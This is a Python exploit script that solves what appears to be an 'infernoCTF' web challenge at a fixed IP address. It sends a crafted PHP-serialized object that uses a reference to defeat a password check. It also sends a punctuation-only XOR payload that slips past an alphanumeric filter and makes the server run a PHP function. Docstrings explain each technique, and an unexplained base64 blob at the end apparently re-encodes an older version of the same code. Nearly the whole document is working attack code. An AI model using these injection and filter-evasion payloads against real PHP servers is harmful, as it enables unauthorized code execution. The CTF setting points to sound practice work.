#!/usr/bin/python3
from requests import get
from bs4 import BeautifulSoup as BS
from re import search
# Base URL of the CTF challenge instance this script talks to (plain HTTP).
host = "http://104.197.168.32:17010/"

# Regular expression used to locate the flag in the response text.
# NOTE(review): main() rebinds this global to the matched flag, so the
# pattern is only valid until the first successful run.
flag = "infernoCTF{.*?}"
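def make_letters(result):
    """Express *result* as the XOR of two punctuation-only strings.

    Returns the text ``"<left>"^"<right>"`` where both operands are drawn
    from a fixed punctuation alphabet and ``ord(left[i]) ^ ord(right[i])``
    equals ``ord(result[i])`` for every position. For each character the
    first alphabet entry that has a partner in the alphabet is used.

    NOTE(review): the output contains no letters or digits, so it passes an
    input filter that only rejects alphanumerics; a filter of that kind does
    not constrain what an evaluated expression computes.

    Args:
        result: The string to encode.

    Returns:
        The two quoted operands joined by ``^``.

    Raises:
        ValueError: If a character of *result* is not the XOR of any two
            alphabet characters. The previous version dropped such
            characters silently and returned an expression for a different,
            shorter string.
    """
    alphabet = [ord(c) for c in "!@$%^&*()_-+={}[]:/?|.>,<"]
    members = set(alphabet)
    left = []
    right = []

    for ch in result:
        target = ord(ch)
        for c1 in alphabet:
            # c1 ^ c2 == target  <=>  c2 == c1 ^ target, so one set lookup
            # replaces the inner scan while selecting the same pair.
            c2 = c1 ^ target
            if c2 in members:
                left.append(chr(c1))
                right.append(chr(c2))
                break
        else:
            raise ValueError(
                "cannot express {!r} as the XOR of two alphabet characters".format(ch)
            )

    return "\"{}\"^\"{}\"".format(''.join(left), ''.join(right))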
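def main():
    """Send the crafted GET request to ``host`` and print the flag it returns.

    Two query parameters are sent:

    * ``id`` - a PHP-serialized ``user`` object with ``name`` set to
      ``admin``, ``pass`` set to null and ``secret`` written as ``R:3``,
      i.e. a reference to the third serialized value (``pass``).
    * ``caption`` - ``$_=<expr>;$_();`` where ``<expr>`` is the
      punctuation-only XOR expression for ``echoFlag``.

    NOTE(review): the server code is not visible here. The request only
    works if the server unserializes ``id`` and evaluates ``caption``;
    presumably it compares ``pass`` with ``secret`` and filters ``caption``
    by character class - confirm against the challenge source.

    Raises:
        SystemExit: If the response contains no text matching the flag
            pattern.
    """
    global flag

    caption = "$_=" + make_letters("echoFlag") + ";$_();"
    data = {
        "id": 'O:4:"user":3:{s:4:"name";s:5:"admin";s:4:"pass";N;s:6:"secret";R:3;}',
        "caption": caption
    }

    # Bound the wait so an unresponsive host cannot hang the script.
    response = get(host, params=data, timeout=10)
    soup = BS(response.content, "lxml")

    # search() returns None when nothing matches; report that instead of
    # failing with AttributeError on .group().
    match = search(flag, soup.text)
    if match is None:
        raise SystemExit(
            "no text matching {!r} in the response (HTTP {})".format(
                flag, response.status_code
            )
        )

    # Kept from the original: the module-level pattern is replaced by the
    # flag, so a second call would search with the flag text as its pattern.
    flag = match.group()
    print(flag)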
# Run the request only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
IyEvdXNyL2Jpbi9weXRob24zCgpmcm9tIHJlcXVlc3RzIGltcG9ydCBnZXQKZnJvbSBiczQgaW1wb3J0IEJlYXV0aWZ1bFNvdXAgYXMgQlMKZnJvbSByZSBpbXBvcnQgc2VhcmNoCgpob3N0ID0gImh0dHA6Ly8xMDQuMTk3LjE2OC4zMjoxNzAxMC8iCmZsYWcgPSAiaW5mZXJub0NURnsuKj99IgoKZGVmIG1ha2VfbGV0dGVycyhyZXN1bHQpOgogICAgY2hhcnMgPSBbb3JkKGMpIGZvciBjIGluICIhQCQlXiYqKClfLSs9e31bXTovP3wuPiw8Il0KICAgIHJlc3VsdCA9IFtvcmQoYykgZm9yIGMgaW4gcmVzdWx0XQogICAgYzFzID0gW10KICAgIGMycyA9IFtdCgogICAgZm9yIHIgaW4gcmVzdWx0OgogICAgICAgIGZvdW5kID0gRmFsc2UKCiAgICAgICAgZm9yIGMxIGluIGNoYXJzOgogICAgICAgICAgICBmb3IgYzIgaW4gY2hhcnM6CiAgICAgICAgICAgICAgICBpZiBjMSBeIGMyID09IHI6CiAgICAgICAgICAgICAgICAgICAgYzFzLmFwcGVuZChjaHIoYzEpKQogICAgICAgICAgICAgICAgICAgIGMycy5hcHBlbmQoY2hyKGMyKSkKICAgICAgICAgICAgICAgICAgICBmb3VuZCA9IFRydWUKICAgICAgICAgICAgICAgICAgICBicmVhawoKICAgICAgICAgICAgaWYgZm91bmQ6CiAgICAgICAgICAgICAgICBicmVhawoKICAgIHJldHVybiAiXCJ7fVwiXlwie31cIiIuZm9ybWF0KCcnLmpvaW4oYzFzKSwgJycuam9pbihjMnMpKQoKZGVmIG1haW4oKToKICAgIGdsb2JhbCBmbGFnCgogICAgY2FwdGlvbiA9ICIkXz0iICsgbWFrZV9sZXR0ZXJzKCJlY2hvRmxhZyIpICsgIjskXygpOyIKICAgIGRhdGEgPSB7CiAgICAgICAgImlkIjogJ086NDoidXNlciI6Mzp7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6InBhc3MiO047czo2OiJzZWNyZXQiO1I6Mzt9JywKICAgICAgICAiY2FwdGlvbiI6IGNhcHRpb24KICAgIH0KCiAgICByZXNwb25zZSA9IGdldChob3N0LCBwYXJhbXM9ZGF0YSkKICAgIHNvdXAgPSBCUyhyZXNwb25zZS5jb250ZW50LCAibHhtbCIpCiAgICBmbGFnID0gc2VhcmNoKGZsYWcsIHNvdXAudGV4dCkuZ3JvdXAoKQogICAgcHJpbnQoZmxhZykKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKCk=